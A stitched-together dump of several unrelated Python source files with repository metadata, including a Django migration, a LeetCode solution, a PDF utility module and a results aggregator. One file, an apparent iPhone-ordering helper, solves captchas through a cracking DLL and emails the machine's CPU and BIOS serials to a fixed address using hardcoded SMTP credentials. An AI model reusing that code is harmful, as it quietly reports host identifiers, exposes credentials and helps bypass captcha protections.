ip_prefix = netaddr.IPNetwork(ip_range['ip_prefix'])
cidr = netaddr.IPNetwork(cidr)
if cidr in ip_prefix:
return 'Unknown CIDR in %s %s' % (ip_range['service'], ip_range['region'])
return 'Unknown CIDR'
#
# Propagate VPC names in VPC-related services (info only fetched during EC2 calls)
#
def propagate_vpc_names(aws_config, current_config, path, current_path, resource_id, callback_args):
if resource_id == ec2_classic:
current_config['name'] = ec2_classic
else:
target_path = copy.deepcopy(current_path)
target_path[1] = 'ec2'
target_path.append(resource_id)
target_path.append('Name')
target_path = '.'.join(target_path)
current_config['name'] = get_value_at(aws_config, target_path, target_path)
|
SecurityFTW/cs-suite
|
tools/Scout2/AWSScout2/services/vpc.py
|
Python
|
gpl-3.0
| 7,331 | 0.005866 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('organizations', '0002_migrate_locations_to_facilities'),
('notifications', '0003_auto_20150912_2049'),
]
operations = [
migrations.AlterField(
model_name='notification',
name='location',
field=models.ForeignKey(verbose_name='facility', to='organizations.Facility'),
),
migrations.RenameField(
model_name='notification',
old_name='location',
new_name='facility',
),
migrations.AlterField(
model_name='notification',
name='facility',
field=models.ForeignKey(to='organizations.Facility'),
),
]
|
alper/volunteer_planner
|
notifications/migrations/0004_auto_20151003_2033.py
|
Python
|
agpl-3.0
| 847 | 0.001181 |
#__author__ = 'hello'
# -*- coding: cp936 -*-
import re
import os
import random
import json
import string
import ctypes
from myexception import *
PATH = './img/'
dm2 = ctypes.WinDLL('./CrackCaptchaAPI.dll')
if not os.path.exists('./img'):
os.mkdir('./img')
def str_tr(content):
instr = "0123456789"
outstr ="QAEDTGUJOL"
trantab = string.maketrans(instr,outstr)
return content.translate(trantab)
def getHid():
import wmi
m = wmi.WMI()
a = ''
b = ''
for cpu in m.Win32_Processor():
a = cpu.Processorid.strip()
for bd in m.Win32_BIOS():
b= bd.SerialNumber.strip()
return a+b
def getEightRandomString():
return ''.join(random.sample(string.ascii_letters,8))
def getCToken(content):
s = ''
pattern = re.compile('securityCToken = "([+-]?\d*)"')
match = pattern.search(content)
if match:
s = match.group(1)
return s
def GetCaptcha(content):
global PATH
filename = ''.join(random.sample(string.ascii_letters,8))
filename += '.jpg'
filename = PATH+filename
img = None
try:
img = open(filename,'wb')
img.write(content)
except IOError:
raise FileCanNotCreate('open file error')
finally:
if img:
img.close()
dm2.D2File.argtypes=[ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_short, ctypes.c_int, ctypes.c_char_p]
dm2.D2File.restype = ctypes.c_int
key = ctypes.c_char_p('fa6fd217145f273b59d7e72c1b63386e')
id = ctypes.c_long(54)
user = ctypes.c_char_p('test')
pas = ctypes.c_char_p('test')
timeout = ctypes.c_short(30)
result = ctypes.create_string_buffer('/0'*100)
ret = -1
ret = dm2.D2File(key,user, pas, filename,timeout,id,(result))
if ret > 0:
return result.value
elif ret == -101:
raise D2FILE(u'Óà¶î²»×ã,ÐèÒª³äÖµ')
elif ret > -199:
raise D2FILE('user info error')
elif ret == -208:
raise D2FILE('software can not user')
elif ret == -210:
raise D2FILE('invalid user')
elif ret == -301:
raise D2FILE('can not find dll')
else:
raise D2FILE(u'ʶ±ð¿â³ö´í')
def GetTimeSlot(content,num):
try:
timeslot = json.loads(content)
slotLen = len(timeslot['timeSlots'])
if num < slotLen:
return timeslot['timeSlots'][num]['startTime'],timeslot['timeSlots]'[num]['timeslotID']]
elif slotLen > 0:
return timeslot['timeSlots'][slotLen-1]['startTime'],timeslot['timeSlots]'[slotLen-1]['timeslotID']]
except ValueError,e:
raise NoJsonData('')
def sendEmail(count):
import smtplib
from email.mime.text import MIMEText
from email.header import Header
smtpserver = 'smtp.163.com'
sender = '[email protected]'
receiver = '[email protected]'
subject = u'Ô¤¶©¸öÊý'
user = 'sghcarbon'
pas = 'carbon216'
content = getHid()+u'Ô¤¶©¸öÊý:'+str(count)
msg = MIMEText(content,'plain','utf-8')
msg['Subject'] = Header(subject,'utf-8')
msg['From'] = sender
msg['To'] = receiver
try:
send_smtp = smtplib.SMTP()
send_smtp.connect(smtpserver)
send_smtp.login(user,pas)
send_smtp.sendmail(sender,receiver,msg.as_string())
send_smtp.close()
print 'ok'
except:
print 'error'
|
dading/iphone_order
|
util.py
|
Python
|
apache-2.0
| 3,365 | 0.012184 |
class Solution(object):
def findPaths(self, m, n, N, i, j):
"""
:type m: int
:type n: int
:type N: int
:type i: int
:type j: int
:rtype: int
"""
MOD = 1000000007
paths = 0
cur = {(i, j): 1}
for i in xrange(N):
next = collections.defaultdict(int)
for (x, y), cnt in cur.iteritems():
for dx, dy in [[-1, 0], [0, 1], [1, 0], [0, -1]]:
nx = x + dx
ny = y + dy
if nx < 0 or ny < 0 or nx >= m or ny >= n:
paths += cnt
paths %= MOD
else:
next[(nx, ny)] += cnt
next[(nx, ny)] %= MOD
cur = next
return paths
# 94 / 94 test cases passed.
# Status: Accepted
# Runtime: 232 ms
# beats 75.36 %
|
zqfan/leetcode
|
algorithms/576. Out of Boundary Paths/solution.py
|
Python
|
gpl-3.0
| 918 | 0 |
# -*- coding: ISO-8859-1 -*-
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__reversion__ = "$Revision: 20 $"
__author__ = "$Author: holtwick $"
__date__ = "$Date: 2007-10-09 12:58:24 +0200 (Di, 09 Okt 2007) $"
from reportlab.lib.units import inch, cm
from reportlab.lib.styles import *
from reportlab.lib.enums import *
from reportlab.lib.colors import *
from reportlab.lib.pagesizes import *
from reportlab.pdfbase import pdfmetrics
# from reportlab.platypus import *
# from reportlab.platypus.flowables import Flowable
# from reportlab.platypus.tableofcontents import TableOfContents
# from reportlab.platypus.para import Para, PageNumberObject, UNDERLINE, HotLink
import reportlab
import copy
import types
import os
import os.path
import pprint
import sys
import string
import re
import base64
import urlparse
import mimetypes
import urllib2
import urllib
import httplib
import tempfile
import shutil
rgb_re = re.compile("^.*?rgb[(]([0-9]+).*?([0-9]+).*?([0-9]+)[)].*?[ ]*$")
_reportlab_version = tuple(map(int, reportlab.Version.split('.')))
if _reportlab_version < (2,1):
raise ImportError("Reportlab Version 2.1+ is needed!")
REPORTLAB22 = _reportlab_version >= (2, 2)
#if not(reportlab.Version[0] == "2" and reportlab.Version[2] >= "1"):
# raise ImportError("Reportlab Version 2.1+ is needed!")
#
#REPORTLAB22 = (reportlab.Version[0] == "2" and reportlab.Version[2] >= "2")
# print "***", reportlab.Version, REPORTLAB22, reportlab.__file__
import logging
log = logging.getLogger("ho.pisa")
try:
import cStringIO as StringIO
except:
import StringIO
try:
import pyPdf
except:
pyPdf = None
try:
from reportlab.graphics import renderPM
except:
renderPM = None
try:
from reportlab.graphics import renderSVG
except:
renderSVG = None
def ErrorMsg():
"""
Helper to get a nice traceback as string
"""
import traceback, sys, cgi
type = value = tb = limit = None
type, value, tb = sys.exc_info()
list = traceback.format_tb(tb, limit) + traceback.format_exception_only(type, value)
return "Traceback (innermost last):\n" + "%-20s %s" % (
string.join(list[: - 1], ""),
list[ - 1])
def toList(value):
if type(value) not in (types.ListType, types.TupleType):
return [value]
return list(value)
def flatten(x):
"""flatten(sequence) -> list
copied from http://kogs-www.informatik.uni-hamburg.de/~meine/python_tricks
Returns a single, flat list which contains all elements retrieved
from the sequence and all recursively contained sub-sequences
(iterables).
Examples:
>>> [1, 2, [3,4], (5,6)]
[1, 2, [3, 4], (5, 6)]
>>> flatten([[[1,2,3], (42,None)], [4,5], [6], 7, MyVector(8,9,10)])
[1, 2, 3, 42, None, 4, 5, 6, 7, 8, 9, 10]"""
result = []
for el in x:
#if isinstance(el, (list, tuple)):
if hasattr(el, "__iter__") and not isinstance(el, basestring):
result.extend(flatten(el))
else:
result.append(el)
return result
def _toColor(arg, default=None):
'''try to map an arbitrary arg to a color instance'''
if isinstance(arg, Color): return arg
tArg = type(arg)
if tArg in (types.ListType, types.TupleType):
assert 3 <= len(arg) <= 4, 'Can only convert 3 and 4 sequences to color'
assert 0 <= min(arg) and max(arg) <= 1
return len(arg) == 3 and Color(arg[0], arg[1], arg[2]) or CMYKColor(arg[0], arg[1], arg[2], arg[3])
elif tArg == types.StringType:
C = getAllNamedColors()
s = arg.lower()
if C.has_key(s): return C[s]
try:
return toColor(eval(arg))
except:
pass
try:
return HexColor(arg)
except:
if default is None:
raise ValueError('Invalid color value %r' % arg)
return default
def getColor(value, default=None):
" Convert to color value "
try:
original = value
if isinstance(value, Color):
return value
value = str(value).strip().lower()
if value == "transparent" or value == "none":
return default
if value in COLOR_BY_NAME:
return COLOR_BY_NAME[value]
if value.startswith("#") and len(value) == 4:
value = "#" + value[1] + value[1] + value[2] + value[2] + value[3] + value[3]
elif rgb_re.search(value):
# e.g., value = "<css function: rgb(153, 51, 153)>", go figure:
r, g, b = [int(x) for x in rgb_re.search(value).groups()]
value = "#%02x%02x%02x" % (r, g, b)
else:
# Shrug
pass
# XXX Throws illegal in 2.1 e.g. toColor('none'),
# therefore we have a workaround here
return _toColor(value)
except ValueError, e:
log.warn("Unknown color %r", original)
return default
def getBorderStyle(value, default=None):
# log.debug(value)
if value and (str(value).lower() not in ("none", "hidden")):
return value
return default
mm = cm / 10.0
dpi96 = (1.0 / 96.0 * inch)
_absoluteSizeTable = {
"1": 50.0 / 100.0,
"xx-small": 50.0 / 100.0,
"x-small": 50.0 / 100.0,
"2": 75.0 / 100.0,
"small": 75.0 / 100.0,
"3": 100.0 / 100.0,
"medium": 100.0 / 100.0,
"4": 125.0 / 100.0,
"large": 125.0 / 100.0,
"5": 150.0 / 100.0,
"x-large": 150.0 / 100.0,
"6": 175.0 / 100.0,
"xx-large": 175.0 / 100.0,
"7": 200.0 / 100.0,
"xxx-large": 200.0 / 100.0,
#"xx-small" : 3./5.,
#"x-small": 3./4.,
#"small": 8./9.,
#"medium": 1./1.,
#"large": 6./5.,
#"x-large": 3./2.,
#"xx-large": 2./1.,
#"xxx-large": 3./1.,
}
_relativeSizeTable = {
"larger": 1.25,
"smaller": 0.75,
"+4": 200.0 / 100.0,
"+3": 175.0 / 100.0,
"+2": 150.0 / 100.0,
"+1": 125.0 / 100.0,
"-1": 75.0 / 100.0,
"-2": 50.0 / 100.0,
"-3": 25.0 / 100.0,
}
MIN_FONT_SIZE = 1.0
def getSize(value, relative=0, base=None, default=0.0):
"""
Converts strings to standard sizes
"""
try:
original = value
if value is None:
return relative
elif type(value) is types.FloatType:
return value
elif type(value) is types.IntType:
return float(value)
elif type(value) in (types.TupleType, types.ListType):
value = "".join(value)
value = str(value).strip().lower().replace(",", ".")
if value[ - 2:] == 'cm':
return float(value[: - 2].strip()) * cm
elif value[ - 2:] == 'mm':
return (float(value[: - 2].strip()) * mm) # 1mm = 0.1cm
elif value[ - 2:] == 'in':
return float(value[: - 2].strip()) * inch # 1pt == 1/72inch
elif value[ - 2:] == 'inch':
return float(value[: - 4].strip()) * inch # 1pt == 1/72inch
elif value[ - 2:] == 'pt':
return float(value[: - 2].strip())
elif value[ - 2:] == 'pc':
return float(value[: - 2].strip()) * 12.0 # 1pc == 12pt
elif value[ - 2:] == 'px':
return float(value[: - 2].strip()) * dpi96 # XXX W3C says, use 96pdi http://www.w3.org/TR/CSS21/syndata.html#length-units
elif value[ - 1:] == 'i': # 1pt == 1/72inch
return float(value[: - 1].strip()) * inch
elif value in ("none", "0", "auto"):
return 0.0
elif relative:
if value[ - 2:] == 'em': # XXX
return (float(value[: - 2].strip()) * relative) # 1em = 1 * fontSize
elif value[ - 2:] == 'ex': # XXX
return (float(value[: - 2].strip()) * (relative / 2.0)) # 1ex = 1/2 fontSize
elif value[ - 1:] == '%':
# print "%", value, relative, (relative * float(value[:-1].strip())) / 100.0
return (relative * float(value[: - 1].strip())) / 100.0 # 1% = (fontSize * 1) / 100
elif value in ("normal", "inherit"):
return relative
elif _relativeSizeTable.has_key(value):
if base:
return max(MIN_FONT_SIZE, base * _relativeSizeTable[value])
return max(MIN_FONT_SIZE, relative * _relativeSizeTable[value])
elif _absoluteSizeTable.has_key(value):
if base:
return max(MIN_FONT_SIZE, base * _absoluteSizeTable[value])
return max(MIN_FONT_SIZE, relative * _absoluteSizeTable[value])
try:
value = float(value)
except:
log.warn("getSize: Not a float %r", value)
return default #value = 0
return max(0, value)
except Exception:
log.warn("getSize %r %r", original, relative, exc_info=1)
# print "ERROR getSize", repr(value), repr(value), e
return default
def getCoords(x, y, w, h, pagesize):
"""
As a stupid programmer I like to use the upper left
corner of the document as the 0,0 coords therefore
we need to do some fancy calculations
"""
#~ print pagesize
ax, ay = pagesize
if x < 0:
x = ax + x
if y < 0:
y = ay + y
if w != None and h != None:
if w <= 0:
w = (ax - x + w)
if h <= 0:
h = (ay - y + h)
return x, (ay - y - h), w, h
return x, (ay - y)
def getBox(box, pagesize):
"""
Parse sizes by corners in the form:
<X-Left> <Y-Upper> <Width> <Height>
The last to values with negative values are interpreted as offsets form
the right and lower border.
"""
box = str(box).split()
if len(box) != 4:
raise Exception, "box not defined right way"
x, y, w, h = map(getSize, box)
return getCoords(x, y, w, h, pagesize)
def getPos(position, pagesize):
"""
Pair of coordinates
"""
position = str(position).split()
if len(position) != 2:
raise Exception, "position not defined right way"
x, y = map(getSize, position)
return getCoords(x, y, None, None, pagesize)
def getBool(s):
" Is it a boolean? "
return str(s).lower() in ("y", "yes", "1", "true")
_uid = 0
def getUID():
" Unique ID "
global _uid
_uid += 1
return str(_uid)
_alignments = {
"left": TA_LEFT,
"center": TA_CENTER,
"middle": TA_CENTER,
"right": TA_RIGHT,
"justify": TA_JUSTIFY,
}
def getAlign(value, default=TA_LEFT):
return _alignments.get(str(value).lower(), default)
#def getVAlign(value):
# # Unused
# return str(value).upper()
GAE = "google.appengine" in sys.modules
if GAE:
STRATEGIES = (
StringIO.StringIO,
StringIO.StringIO)
else:
STRATEGIES = (
StringIO.StringIO,
tempfile.NamedTemporaryFile)
class pisaTempFile(object):
"""A temporary file implementation that uses memory unless
either capacity is breached or fileno is requested, at which
point a real temporary file will be created and the relevant
details returned
If capacity is -1 the second strategy will never be used.
Inspired by:
http://code.activestate.com/recipes/496744/
"""
STRATEGIES = STRATEGIES
CAPACITY = 10 * 1024
def __init__(self, buffer="", capacity=CAPACITY):
"""Creates a TempFile object containing the specified buffer.
If capacity is specified, we use a real temporary file once the
file gets larger than that size. Otherwise, the data is stored
in memory.
"""
#if hasattr(buffer, "read"):
#shutil.copyfileobj( fsrc, fdst[, length])
self.capacity = capacity
self.strategy = int(len(buffer) > self.capacity)
try:
self._delegate = self.STRATEGIES[self.strategy]()
except:
# Fallback for Google AppEnginge etc.
self._delegate = self.STRATEGIES[0]()
self.write(buffer)
def makeTempFile(self):
" Switch to next startegy. If an error occured stay with the first strategy "
if self.strategy == 0:
try:
new_delegate = self.STRATEGIES[1]()
new_delegate.write(self.getvalue())
self._delegate = new_delegate
self.strategy = 1
log.warn("Created temporary file %s", self.name)
except:
self.capacity = - 1
def getFileName(self):
" Get a named temporary file "
self.makeTempFile()
return self.name
def fileno(self):
"""Forces this buffer to use a temporary file as the underlying.
object and returns the fileno associated with it.
"""
self.makeTempFile()
return self._delegate.fileno()
def getvalue(self):
" Get value of file. Work around for second strategy "
if self.strategy == 0:
return self._delegate.getvalue()
self._delegate.flush()
self._delegate.seek(0)
return self._delegate.read()
def write(self, value):
" If capacity != -1 and length of file > capacity it is time to switch "
if self.capacity > 0 and self.strategy == 0:
len_value = len(value)
if len_value >= self.capacity:
needs_new_strategy = True
else:
self.seek(0, 2) # find end of file
needs_new_strategy = \
(self.tell() + len_value) >= self.capacity
if needs_new_strategy:
self.makeTempFile()
self._delegate.write(value)
def __getattr__(self, name):
try:
return getattr(self._delegate, name)
except AttributeError:
# hide the delegation
e = "object '%s' has no attribute '%s'" \
% (self.__class__.__name__, name)
raise AttributeError(e)
_rx_datauri = re.compile("^data:(?P<mime>[a-z]+/[a-z]+);base64,(?P<data>.*)$", re.M | re.DOTALL)
class pisaFileObject:
"""
XXX
"""
def __init__(self, uri, basepath=None):
self.basepath = basepath
self.mimetype = None
self.file = None
self.data = None
self.uri = None
self.local = None
self.tmp_file = None
uri = str(uri)
log.debug("FileObject %r, Basepath: %r", uri, basepath)
# Data URI
if uri.startswith("data:"):
m = _rx_datauri.match(uri)
self.mimetype = m.group("mime")
self.data = base64.decodestring(m.group("data"))
else:
# Check if we have an external scheme
if basepath and not (uri.startswith("http://") or uri.startswith("https://")):
urlParts = urlparse.urlparse(basepath)
else:
urlParts = urlparse.urlparse(uri)
log.debug("URLParts: %r", urlParts)
# Drive letters have len==1 but we are looking for things like http:
if len(urlParts[0]) > 1 :
# External data
if basepath:
uri = urlparse.urljoin(basepath, uri)
#path = urlparse.urlsplit(url)[2]
#mimetype = getMimeType(path)
# Using HTTPLIB
server, path = urllib.splithost(uri[uri.find("//"):])
if uri.startswith("https://"):
conn = httplib.HTTPSConnection(server)
else:
conn = httplib.HTTPConnection(server)
conn.request("GET", path)
r1 = conn.getresponse()
# log.debug("HTTP %r %r %r %r", server, path, uri, r1)
if (r1.status, r1.reason) == (200, "OK"):
# data = r1.read()
self.mimetype = r1.getheader("Content-Type", None).split(";")[0]
self.uri = uri
if r1.getheader("content-encoding") == "gzip":
# zbuf = cStringIO.StringIO(data)
import gzip
self.file = gzip.GzipFile(mode="rb", fileobj=r1)
#data = zfile.read()
#zfile.close()
else:
self.file = r1
# self.file = urlResponse
else:
urlResponse = urllib2.urlopen(uri)
self.mimetype = urlResponse.info().get("Content-Type", None).split(";")[0]
self.uri = urlResponse.geturl()
self.file = urlResponse
else:
# Local data
if basepath:
uri = os.path.normpath(os.path.join(basepath, uri))
if os.path.isfile(uri):
self.uri = uri
self.local = uri
self.setMimeTypeByName(uri)
self.file = open(uri, "rb")
def getFile(self):
if self.file is not None:
return self.file
if self.data is not None:
return pisaTempFile(self.data)
return None
def getNamedFile(self):
if self.notFound():
return None
if self.local:
return str(self.local)
if not self.tmp_file:
self.tmp_file = tempfile.NamedTemporaryFile()
if self.file:
shutil.copyfileobj(self.file, self.tmp_file)
else:
self.tmp_file.write(self.getData())
self.tmp_file.flush()
return self.tmp_file.name
def getData(self):
if self.data is not None:
return self.data
if self.file is not None:
self.data = self.file.read()
return self.data
return None
def notFound(self):
return (self.file is None) and (self.data is None)
def setMimeTypeByName(self, name):
" Guess the mime type "
mimetype = mimetypes.guess_type(name)[0]
if mimetype is not None:
self.mimetype = mimetypes.guess_type(name)[0].split(";")[0]
def getFile(*a , **kw):
file = pisaFileObject(*a, **kw)
if file.notFound():
return None
return file
COLOR_BY_NAME = {
'activeborder': Color(212, 208, 200),
'activecaption': Color(10, 36, 106),
'aliceblue': Color(.941176, .972549, 1),
'antiquewhite': Color(.980392, .921569, .843137),
'appworkspace': Color(128, 128, 128),
'aqua': Color(0, 1, 1),
'aquamarine': Color(.498039, 1, .831373),
'azure': Color(.941176, 1, 1),
'background': Color(58, 110, 165),
'beige': Color(.960784, .960784, .862745),
'bisque': Color(1, .894118, .768627),
'black': Color(0, 0, 0),
'blanchedalmond': Color(1, .921569, .803922),
'blue': Color(0, 0, 1),
'blueviolet': Color(.541176, .168627, .886275),
'brown': Color(.647059, .164706, .164706),
'burlywood': Color(.870588, .721569, .529412),
'buttonface': Color(212, 208, 200),
'buttonhighlight': Color(255, 255, 255),
'buttonshadow': Color(128, 128, 128),
'buttontext': Color(0, 0, 0),
'cadetblue': Color(.372549, .619608, .627451),
'captiontext': Color(255, 255, 255),
'chartreuse': Color(.498039, 1, 0),
'chocolate': Color(.823529, .411765, .117647),
'coral': Color(1, .498039, .313725),
'cornflowerblue': Color(.392157, .584314, .929412),
'cornsilk': Color(1, .972549, .862745),
'crimson': Color(.862745, .078431, .235294),
'cyan': Color(0, 1, 1),
'darkblue': Color(0, 0, .545098),
'darkcyan': Color(0, .545098, .545098),
'darkgoldenrod': Color(.721569, .52549, .043137),
'darkgray': Color(.662745, .662745, .662745),
'darkgreen': Color(0, .392157, 0),
'darkgrey': Color(.662745, .662745, .662745),
'darkkhaki': Color(.741176, .717647, .419608),
'darkmagenta': Color(.545098, 0, .545098),
'darkolivegreen': Color(.333333, .419608, .184314),
'darkorange': Color(1, .54902, 0),
'darkorchid': Color(.6, .196078, .8),
'darkred': Color(.545098, 0, 0),
'darksalmon': Color(.913725, .588235, .478431),
'darkseagreen': Color(.560784, .737255, .560784),
'darkslateblue': Color(.282353, .239216, .545098),
'darkslategray': Color(.184314, .309804, .309804),
'darkslategrey': Color(.184314, .309804, .309804),
'darkturquoise': Color(0, .807843, .819608),
'darkviolet': Color(.580392, 0, .827451),
'deeppink': Color(1, .078431, .576471),
'deepskyblue': Color(0, .74902, 1),
'dimgray': Color(.411765, .411765, .411765),
'dimgrey': Color(.411765, .411765, .411765),
'dodgerblue': Color(.117647, .564706, 1),
'firebrick': Color(.698039, .133333, .133333),
'floralwhite': Color(1, .980392, .941176),
'forestgreen': Color(.133333, .545098, .133333),
'fuchsia': Color(1, 0, 1),
'gainsboro': Color(.862745, .862745, .862745),
'ghostwhite': Color(.972549, .972549, 1),
'gold': Color(1, .843137, 0),
'goldenrod': Color(.854902, .647059, .12549),
'gray': Color(.501961, .501961, .501961),
'graytext': Color(128, 128, 128),
'green': Color(0, .501961, 0),
'greenyellow': Color(.678431, 1, .184314),
'grey': Color(.501961, .501961, .501961),
'highlight': Color(10, 36, 106),
'highlighttext': Color(255, 255, 255),
'honeydew': Color(.941176, 1, .941176),
'hotpink': Color(1, .411765, .705882),
'inactiveborder': Color(212, 208, 200),
'inactivecaption': Color(128, 128, 128),
'inactivecaptiontext': Color(212, 208, 200),
'indianred': Color(.803922, .360784, .360784),
'indigo': Color(.294118, 0, .509804),
'infobackground': Color(255, 255, 225),
'infotext': Color(0, 0, 0),
'ivory': Color(1, 1, .941176),
'khaki': Color(.941176, .901961, .54902),
'lavender': Color(.901961, .901961, .980392),
'lavenderblush': Color(1, .941176, .960784),
'lawngreen': Color(.486275, .988235, 0),
'lemonchiffon': Color(1, .980392, .803922),
'lightblue': Color(.678431, .847059, .901961),
'lightcoral': Color(.941176, .501961, .501961),
'lightcyan': Color(.878431, 1, 1),
'lightgoldenrodyellow': Color(.980392, .980392, .823529),
'lightgray': Color(.827451, .827451, .827451),
'lightgreen': Color(.564706, .933333, .564706),
'lightgrey': Color(.827451, .827451, .827451),
'lightpink': Color(1, .713725, .756863),
'lightsalmon': Color(1, .627451, .478431),
'lightseagreen': Color(.12549, .698039, .666667),
'lightskyblue': Color(.529412, .807843, .980392),
'lightslategray': Color(.466667, .533333, .6),
'lightslategrey': Color(.466667, .533333, .6),
'lightsteelblue': Color(.690196, .768627, .870588),
'lightyellow': Color(1, 1, .878431),
'lime': Color(0, 1, 0),
'limegreen': Color(.196078, .803922, .196078),
'linen': Color(.980392, .941176, .901961),
'magenta': Color(1, 0, 1),
'maroon': Color(.501961, 0, 0),
'mediumaquamarine': Color(.4, .803922, .666667),
'mediumblue': Color(0, 0, .803922),
'mediumorchid': Color(.729412, .333333, .827451),
'mediumpurple': Color(.576471, .439216, .858824),
'mediumseagreen': Color(.235294, .701961, .443137),
'mediumslateblue': Color(.482353, .407843, .933333),
'mediumspringgreen': Color(0, .980392, .603922),
'mediumturquoise': Color(.282353, .819608, .8),
'mediumvioletred': Color(.780392, .082353, .521569),
'menu': Color(212, 208, 200),
'menutext': Color(0, 0, 0),
'midnightblue': Color(.098039, .098039, .439216),
'mintcream': Color(.960784, 1, .980392),
'mistyrose': Color(1, .894118, .882353),
'moccasin': Color(1, .894118, .709804),
'navajowhite': Color(1, .870588, .678431),
'navy': Color(0, 0, .501961),
'oldlace': Color(.992157, .960784, .901961),
'olive': Color(.501961, .501961, 0),
'olivedrab': Color(.419608, .556863, .137255),
'orange': Color(1, .647059, 0),
'orangered': Color(1, .270588, 0),
'orchid': Color(.854902, .439216, .839216),
'palegoldenrod': Color(.933333, .909804, .666667),
'palegreen': Color(.596078, .984314, .596078),
'paleturquoise': Color(.686275, .933333, .933333),
'palevioletred': Color(.858824, .439216, .576471),
'papayawhip': Color(1, .937255, .835294),
'peachpuff': Color(1, .854902, .72549),
'peru': Color(.803922, .521569, .247059),
'pink': Color(1, .752941, .796078),
'plum': Color(.866667, .627451, .866667),
'powderblue': Color(.690196, .878431, .901961),
'purple': Color(.501961, 0, .501961),
'red': Color(1, 0, 0),
'rosybrown': Color(.737255, .560784, .560784),
'royalblue': Color(.254902, .411765, .882353),
'saddlebrown': Color(.545098, .270588, .07451),
'salmon': Color(.980392, .501961, .447059),
'sandybrown': Color(.956863, .643137, .376471),
'scrollbar': Color(212, 208, 200),
'seagreen': Color(.180392, .545098, .341176),
'seashell': Color(1, .960784, .933333),
'sienna': Color(.627451, .321569, .176471),
'silver': Color(.752941, .752941, .752941),
'skyblue': Color(.529412, .807843, .921569),
'slateblue': Color(.415686, .352941, .803922),
'slategray': Color(.439216, .501961, .564706),
'slategrey': Color(.439216, .501961, .564706),
'snow': Color(1, .980392, .980392),
'springgreen': Color(0, 1, .498039),
'steelblue': Color(.27451, .509804, .705882),
'tan': Color(.823529, .705882, .54902),
'teal': Color(0, .501961, .501961),
'thistle': Color(.847059, .74902, .847059),
'threeddarkshadow': Color(64, 64, 64),
'threedface': Color(212, 208, 200),
'threedhighlight': Color(255, 255, 255),
'threedlightshadow': Color(212, 208, 200),
'threedshadow': Color(128, 128, 128),
'tomato': Color(1, .388235, .278431),
'turquoise': Color(.25098, .878431, .815686),
'violet': Color(.933333, .509804, .933333),
'wheat': Color(.960784, .870588, .701961),
'white': Color(1, 1, 1),
'whitesmoke': Color(.960784, .960784, .960784),
'window': Color(255, 255, 255),
'windowframe': Color(0, 0, 0),
'windowtext': Color(0, 0, 0),
'yellow': Color(1, 1, 0),
'yellowgreen': Color(.603922, .803922, .196078)}
|
rcucui/Pisa-util-fix
|
sx/pisa3/pisa_util.py
|
Python
|
apache-2.0
| 26,330 | 0.006077 |
#!/usr/bin/python
import sys, os, re
import json
import argparse
import pprint
arg_parser = argparse.ArgumentParser(description='Define tests')
arg_parser.add_argument('-p', '--pretty-print', action="store_true", help="select human friendly output, default is CSV")
arg_parser.add_argument('-i', '--info', action="store_true", help="show info about the data available in the specified directory")
arg_parser.add_argument('-k', '--show-keys', action="store_true", help="show available keys")
arg_parser.add_argument('-a', '--all-connections', action="store_true", help="extract results for all connections")
arg_parser.add_argument('-c', '--concurrent', default=0, help="filter results with specified concurrency", type=int)
arg_parser.add_argument('in_dir', help="Input directory contatining JSON files")
arg_parser.add_argument('keys', nargs=argparse.REMAINDER, help="keys to extract")
args = arg_parser.parse_args()
def load_json(fname):
return json.load(open(fname, "r"))
def load_all(src_dir):
data = {}
file_list = os.listdir(src_dir)
for f in file_list:
if not os.path.splitext(f)[1] == ".json":
continue
fp = os.path.join(src_dir, f)
try:
data[f] = load_json(fp)
except ValueError:
print("Skipping corrupted file: %s" % f)
continue
return data
def dotkey(tree_root, dotted_key):
dotted_key = dotted_key.split(".")
value = tree_root
for key in dotted_key:
value = value[key]
return value
def get_keys(f):
keys = []
t = data[f]
unvisited = list(t.keys())
while len(unvisited) > 0:
k = unvisited.pop()
child = dotkey(t, k)
if type(child) != dict:
keys.append(k)
else:
for kname in child.keys():
unvisited.append(k+"."+kname)
return keys
# unvisited += t[k]
# values = []
# k = key.split(".")
# for d in data:
# values.append(get_value(d, k))
# return values
def print_csv_header(columns):
out = "measurement"
for title in columns:
out += ", " + title
print(out)
def get_values_measurement(tree, keys):
out = []
for key in keys:
try:
out.append(dotkey(tree, key))
except KeyError:
out.append("N/A")
return out
def print_values(measure, values):
if args.pretty_print:
print("Measure: %s" % measure)
for v in values:
print("\t%s" % (v,))
else:
s = measure
for v in values:
s += "," + str(v)
print(s)
def expand_keys(template_measure):
"""For each key that contains conn_N will add all other conn_* keys with the
same suffix"""
new_keys = args.keys[:]
all_keys = get_keys(template_measure)
for ukey in args.keys:
match = re.search(r"conn_[0-9]+\.", ukey)
if match:
suffix = ukey[match.end():]
new_keys.remove(ukey)
for skey in all_keys:
if re.search(suffix+"$", skey):
new_keys.append(skey)
return new_keys
def filter_measures(data, concurrent):
"""Return a filtered data dictionary containing only the selected concurrent number"""
measures = list(data.keys())
for measure in measures:
conc = get_values_measurement(data[measure], ["concurrent"])[0]
if conc != concurrent:
del data[measure]
return data
data = load_all(args.in_dir)
if args.info:
descrs = get_all_values("name")
print("These measurements are available:")
for d in sorted(descrs, key=lambda x: int(x.split("_")[0])):
print(d, ":", descrs[d][0])
sys.exit(0)
if args.show_keys:
f = sorted(data.keys())[-1]
print("Reading keys from file %s" % f)
ks = get_keys(f)
for k in sorted(ks):
print(k)
sys.exit(0)
if args.all_connections and args.concurrent == 0:
print("Error: -a requires -c")
sys.exit(1)
if args.concurrent != 0:
data = filter_measures(data, args.concurrent)
if args.all_connections:
new_keys = expand_keys(list(data.keys())[0])
else:
new_keys = args.keys[:]
if not args.pretty_print:
print_csv_header(new_keys)
for measure in data.keys():
values = get_values_measurement(data[measure], new_keys)
print_values(measure, values)
|
bigfootproject/OSMEF
|
data_processing/aggregate_old.py
|
Python
|
apache-2.0
| 4,348 | 0.00483 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Update HTPC Manager from Github. Either through git command or tarball.
